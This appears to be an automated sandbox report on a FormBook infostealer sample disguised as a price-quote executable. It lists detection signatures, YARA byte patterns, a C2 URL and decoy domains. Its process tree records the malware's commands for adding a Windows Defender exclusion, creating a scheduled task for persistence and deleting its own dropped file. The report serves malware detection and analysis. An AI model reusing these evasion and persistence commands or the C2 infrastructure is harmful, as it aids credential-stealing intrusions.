Edit tour

Windows Analysis Report
IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe

Overview

General Information

Sample Name:	IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe
Analysis ID:	1327821
MD5:	94c19a35210d356074c3cfaa1ea92350
SHA1:	c0ee6ed414e3a3a3b6c02ebb73dfcb761e276b3f
SHA256:	f1f7dcf88e6ca4fa8165311d3920015410923574ed2f84decec634adab432063
Tags:	exe
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected FormBook

Malicious sample detected (through community Yara rule)

Yara detected AntiVM3

Antivirus / Scanner detection for submitted sample

System process connects to network (likely due to code injection or exploit)

Sigma detected: Scheduled temp file as task from temp location

Antivirus detection for URL or domain

Antivirus detection for dropped file

Multi AV Scanner detection for dropped file

Snort IDS alert for network traffic

Sample uses process hollowing technique

Maps a DLL or memory area into another process

Machine Learning detection for sample

Modifies the prolog of user mode functions (user mode inline hooks)

.NET source code contains potential unpacker

.NET source code contains method to dynamically call methods (often used by packers)

Queues an APC in another process (thread injection)

Tries to detect virtualization through RDTSC time measurements

Machine Learning detection for dropped file

Modifies the context of a thread in another process (thread injection)

C2 URLs / IPs found in malware configuration

Adds a directory exclusion to Windows Defender

Uses schtasks.exe or at.exe to add and modify task schedules

Uses 32bit PE files

Uses a Windows Living Off The Land Binaries (LOL bins)

Found decision node followed by non-executed suspicious APIs

Queries the volume information (name, serial number etc) of a device

Yara signature match

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to call native functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Contains functionality for execution timing, often used to detect debuggers

Contains long sleeps (>= 3 min)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Sample file is different than original file name gathered from version info

Drops PE files

Contains functionality to read the PEB

Checks if the current process is being debugged

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w10x64

IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe (PID: 7516 cmdline: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe MD5: 94C19A35210D356074C3CFAA1EA92350)

powershell.exe (PID: 7816 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 7868 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ySqETqNvdTbE" /XML "C:\Users\user\AppData\Local\Temp\tmpF7.tmp MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe (PID: 8120 cmdline: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe MD5: 94C19A35210D356074C3CFAA1EA92350)

ySqETqNvdTbE.exe (PID: 8176 cmdline: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe MD5: 94C19A35210D356074C3CFAA1EA92350)

schtasks.exe (PID: 1080 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ySqETqNvdTbE" /XML "C:\Users\user\AppData\Local\Temp\tmp17EA.tmp MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 5652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

ySqETqNvdTbE.exe (PID: 1544 cmdline: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe MD5: 94C19A35210D356074C3CFAA1EA92350)

explorer.exe (PID: 3504 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)

cmstp.exe (PID: 1824 cmdline: C:\Windows\SysWOW64\cmstp.exe MD5: D7AABFAB5BEFD53BA3A27BD48F3CC675)

cmd.exe (PID: 2240 cmdline: /c del "C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 2280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/ https://asec.ahnlab.com/en/32149/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.transporteturisticofradan.space/ifrg/"], "decoy": ["68czt.com", "gvosmm.com", "stakehs.fun", "constructionloancalculator.net", "arissahotel.com", "mndhhy.store", "961bets.com", "legendsturf.com", "hbcucuratefoundation.com", "vespeciative.com", "zysport.net", "terravortex.cfd", "tasteitmakeit.com", "muversus.pro", "kqguvq.cfd", "despachomorelia.com", "66tv982.xyz", "wineroomcontractor.com", "boat-insurance-today.world", "sygree.net", "cigarettesonlinestore.net", "wholesomeroyal.com", "nimbuscleaners.online", "skatingisamazing.com", "58457952.com", "scnanhong.net", "bitcock.net", "bezobotnation.net", "onesixthpress.com", "bellasofisticada.com", "alivenode.com", "qagkqjps.asia", "pokerhebatt7.com", "bindalmegaprojects.com", "ecolecsm.com", "yljinjia.com", "75241.shop", "nitenitedidthis.com", "zaesstudios.com", "dewdrop.store", "thegolfstore.net", "acs-gabon.com", "8651k.vip", "hzchenzhang.com", "ockqen.cfd", "copperstatenods.com", "healthsout.net", "lennard.codes", "695d.xyz", "theavenuclinic.com", "thzrcd.site", "oliverstamatatos.com", "imroahan.dev", "ruffibuddy.xyz", "metashop-02.online", "h0kj.lat", "gdminsheng.icu", "zaphub.app", "trust-official-2.com", "ecodfairs.top", "a88d.xyz", "badaksegar01.click", "creams-72542.bond", "a4ilh1.cfd"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
0000000B.00000002.1556450459.000000000493C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000B.00000002.1556450459.000000000493C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000B.00000002.1556450459.000000000493C000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x7081:$a1: 3C 30 50 4F 53 54 74 09 40 0x1d9b0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xb7ef:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x166d7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0000000B.00000002.1556450459.000000000493C000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0xa738:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xa9a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x164d5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15fc1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x165d7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1674f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xb3ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1523c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xc0b3:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1c717:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1d71a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000B.00000002.1556450459.000000000493C000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x19639:$sqlite3step: 68 34 1C 7B E1 0x1974c:$sqlite3step: 68 34 1C 7B E1 0x19668:$sqlite3text: 68 38 2A 90 C5 0x1978d:$sqlite3text: 68 38 2A 90 C5 0x1967b:$sqlite3blob: 68 53 D8 7F 8C 0x197a3:$sqlite3blob: 68 53 D8 7F 8C
0000000B.00000002.1556450459.0000000003FF4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000B.00000002.1556450459.0000000003FF4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000B.00000002.1556450459.0000000003FF4000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6471:$a1: 3C 30 50 4F 53 54 74 09 40 0x33891:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cda0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x4a1c0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xabdf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x37fff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x15ac7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83 0x42ee7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0000000B.00000002.1556450459.0000000003FF4000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9b28:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9d92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x36f48:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x371b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x158c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x42ce5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x153b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x427d1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x159c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x42de7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x15b3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x42f5f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa7aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x37bca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1462c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x41a4c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb4a3:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x388c3:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1bb07:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x48f27:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1cb0a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000B.00000002.1556450459.0000000003FF4000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18a29:$sqlite3step: 68 34 1C 7B E1 0x18b3c:$sqlite3step: 68 34 1C 7B E1 0x45e49:$sqlite3step: 68 34 1C 7B E1 0x45f5c:$sqlite3step: 68 34 1C 7B E1 0x18a58:$sqlite3text: 68 38 2A 90 C5 0x18b7d:$sqlite3text: 68 38 2A 90 C5 0x45e78:$sqlite3text: 68 38 2A 90 C5 0x45f9d:$sqlite3text: 68 38 2A 90 C5 0x18a6b:$sqlite3blob: 68 53 D8 7F 8C 0x18b93:$sqlite3blob: 68 53 D8 7F 8C 0x45e8b:$sqlite3blob: 68 53 D8 7F 8C 0x45fb3:$sqlite3blob: 68 53 D8 7F 8C
00000011.00000002.3880300109.0000000002B70000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000011.00000002.3880300109.0000000002B70000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000011.00000002.3880300109.0000000002B70000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cb80:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000011.00000002.3880300109.0000000002B70000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b8e7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c8ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000011.00000002.3880300109.0000000002B70000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18809:$sqlite3step: 68 34 1C 7B E1 0x1891c:$sqlite3step: 68 34 1C 7B E1 0x18838:$sqlite3text: 68 38 2A 90 C5 0x1895d:$sqlite3text: 68 38 2A 90 C5 0x1884b:$sqlite3blob: 68 53 D8 7F 8C 0x18973:$sqlite3blob: 68 53 D8 7F 8C
0000000A.00000002.1478140817.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000A.00000002.1478140817.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000A.00000002.1478140817.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cb80:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0000000A.00000002.1478140817.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b8e7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c8ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000A.00000002.1478140817.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18809:$sqlite3step: 68 34 1C 7B E1 0x1891c:$sqlite3step: 68 34 1C 7B E1 0x18838:$sqlite3text: 68 38 2A 90 C5 0x1895d:$sqlite3text: 68 38 2A 90 C5 0x1884b:$sqlite3blob: 68 53 D8 7F 8C 0x18973:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000002.1498050969.0000000003EC2000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000001.00000002.1498050969.0000000003EC2000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000001.00000002.1498050969.0000000003EC2000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x7179:$a1: 3C 30 50 4F 53 54 74 09 40 0x35599:$a1: 3C 30 50 4F 53 54 74 09 40 0x629b9:$a1: 3C 30 50 4F 53 54 74 09 40 0x1daa8:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x4bec8:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x792e8:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xb8e7:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x39d07:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x67127:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x167cf:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83 0x44bef:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83 0x7200f:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000001.00000002.1498050969.0000000003EC2000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0xa830:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xaa9a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x38c50:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x38eba:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x66070:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x662da:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x165cd:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x449ed:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x71e0d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x160b9:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x444d9:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x718f9:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x166cf:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x44aef:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x71f0f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x16847:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x44c67:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x72087:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xb4b2:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x398d2:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x66cf2:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
00000001.00000002.1498050969.0000000003EC2000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x19731:$sqlite3step: 68 34 1C 7B E1 0x19844:$sqlite3step: 68 34 1C 7B E1 0x47b51:$sqlite3step: 68 34 1C 7B E1 0x47c64:$sqlite3step: 68 34 1C 7B E1 0x74f71:$sqlite3step: 68 34 1C 7B E1 0x75084:$sqlite3step: 68 34 1C 7B E1 0x19760:$sqlite3text: 68 38 2A 90 C5 0x19885:$sqlite3text: 68 38 2A 90 C5 0x47b80:$sqlite3text: 68 38 2A 90 C5 0x47ca5:$sqlite3text: 68 38 2A 90 C5 0x74fa0:$sqlite3text: 68 38 2A 90 C5 0x750c5:$sqlite3text: 68 38 2A 90 C5 0x19773:$sqlite3blob: 68 53 D8 7F 8C 0x1989b:$sqlite3blob: 68 53 D8 7F 8C 0x47b93:$sqlite3blob: 68 53 D8 7F 8C 0x47cbb:$sqlite3blob: 68 53 D8 7F 8C 0x74fb3:$sqlite3blob: 68 53 D8 7F 8C 0x750db:$sqlite3blob: 68 53 D8 7F 8C
00000011.00000002.3880157692.0000000002B10000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000011.00000002.3880157692.0000000002B10000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000011.00000002.3880157692.0000000002B10000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cb80:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000011.00000002.3880157692.0000000002B10000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b8e7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c8ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000011.00000002.3880157692.0000000002B10000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18809:$sqlite3step: 68 34 1C 7B E1 0x1891c:$sqlite3step: 68 34 1C 7B E1 0x18838:$sqlite3text: 68 38 2A 90 C5 0x1895d:$sqlite3text: 68 38 2A 90 C5 0x1884b:$sqlite3blob: 68 53 D8 7F 8C 0x18973:$sqlite3blob: 68 53 D8 7F 8C
00000011.00000002.3878883525.0000000000800000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000011.00000002.3878883525.0000000000800000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000011.00000002.3878883525.0000000000800000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cb80:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000011.00000002.3878883525.0000000000800000.00000040.80000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b8e7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c8ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000011.00000002.3878883525.0000000000800000.00000040.80000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18809:$sqlite3step: 68 34 1C 7B E1 0x1891c:$sqlite3step: 68 34 1C 7B E1 0x18838:$sqlite3text: 68 38 2A 90 C5 0x1895d:$sqlite3text: 68 38 2A 90 C5 0x1884b:$sqlite3blob: 68 53 D8 7F 8C 0x18973:$sqlite3blob: 68 53 D8 7F 8C
Process Memory Space: IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe PID: 7516	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe PID: 7516	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x4bddb:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe PID: 8120	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x63a59:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: ySqETqNvdTbE.exe PID: 8176	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: ySqETqNvdTbE.exe PID: 8176	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x19dd4:$a1: 3C 30 50 4F 53 54 74 09 40 0x1f96e:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: cmstp.exe PID: 1824	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x10a069:$a1: 3C 30 50 4F 53 54 74 09 40 0x140d96:$a1: 3C 30 50 4F 53 54 74 09 40 0x17ec95:$a1: 3C 30 50 4F 53 54 74 09 40
Click to see the 36 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
10.2.IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
10.2.IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
10.2.IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe.400000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x5451:$a1: 3C 30 50 4F 53 54 74 09 40 0x1bd80:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x9bbf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x14aa7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
